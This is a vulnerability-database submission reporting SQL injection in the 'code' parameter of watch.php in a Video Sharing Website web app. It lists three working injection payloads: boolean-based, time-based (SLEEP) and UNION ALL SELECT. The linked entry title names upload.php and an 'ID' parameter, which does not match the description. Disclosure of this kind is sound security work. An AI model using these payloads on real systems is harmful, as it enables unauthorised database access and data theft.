| Title | SQL injection vulnerability exists in Video Sharing Website |
|---|
| Description | SQL injection vulnerability exists in code parameter of watch.php file of Video Sharing Website
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit index.php and page parameter is ‘watch’,it will include watch.php,and code parameter can do sql injection.
Payload:
code=LUwzRtMgZDEG0YcN' AND 3*3*9<(2*4) AND '000KOYx'='000KOYx' RLIKE (SELECT (CASE WHEN (4792=4792) THEN 0x4c55777a52744d675a4445473059634e253237253230414e44253230332a332a3925334328322a3429253230414e442532302532373030304b4f59782532373d2532373030304b4f5978 ELSE 0x28 END))-- jvcI&page=watch
or
code=LUwzRtMgZDEG0YcN' AND 3*3*9<(2*4) AND '000KOYx'='000KOYx' AND (SELECT 7633 FROM (SELECT(SLEEP(5)))UqOt)-- bNKJ&page=watch
or
code=LUwzRtMgZDEG0YcN' AND 3*3*9<(2*4) AND '000KOYx'='000KOYx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176716a71,0x45484d757457507841756f6163616e6247775257695274414e6854794f626c716178756346654164,0x7170707071),NULL,NULL,NULL,NULL,NULL-- -&page=watch |
|---|
| Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Video%20Sharing%20Website/Video%20Sharing%20Website%20vuln%204.pdf |
|---|
| User | SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874) |
|---|
| Submission | 04/14/2023 06:11 (3 years ago) |
|---|
| Moderation | 04/14/2023 08:21 (2 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 225914 [Campcodes Video Sharing Website 1.0 upload.php ID sql injection] |
|---|
| Points | 20 |
|---|